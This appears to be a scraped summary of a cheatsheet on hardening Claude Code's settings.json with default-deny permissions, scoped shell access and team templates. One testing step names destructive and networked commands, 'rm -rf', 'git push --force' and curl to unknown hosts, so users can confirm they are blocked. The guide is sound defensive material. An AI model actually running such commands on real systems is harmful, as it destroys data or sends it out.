HARDEN CLAUDE CODE WITH A SAFER SETTINGS.JSON
A practical cheatsheet shows how to harden Claude Code's settings.json to reduce risky shell, file, and network actions. If you reflexively approve prompts, a ...
A practical cheatsheet shows how to harden Claude Code's settings.json to reduce risky shell, file, and network actions.
If you reflexively approve prompts, a code agent can run destructive commands. This hardening cheatsheet walks through locking down permissions, default-deny policies, and safer approvals.
It suggests scoping shell commands, adding guardrails for Git and package managers, and requiring review for file writes and external calls.
Treat editor settings like policy-as-code so teams can standardize safer defaults across repos and environments.
Code agents can run destructive or networked actions; locked-down defaults reduce blast radius.
Team-wide templates stop accidental approvals and align developer environments with security controls.
-
terminal
Create a restricted settings.json and try typical workflows (build, test, git, package installs) to find the minimum necessary permissions.
-
terminal
Simulate risky actions (rm -rf, git push --force, curl to unknown hosts) and confirm they are blocked or require explicit review.
Legacy codebase integration strategies...
- 01.
Ship an org-approved settings.json via repo workspace settings and dotfiles; audit exceptions during rollout.
- 02.
Pair with pre-commit and branch protections so bypassing the agent still hits safeguards.
Fresh architecture paradigms...
- 01.
Start projects with a default-deny settings template and narrow permissions per service.
- 02.
Use dev containers to give the agent only the files and tools it needs.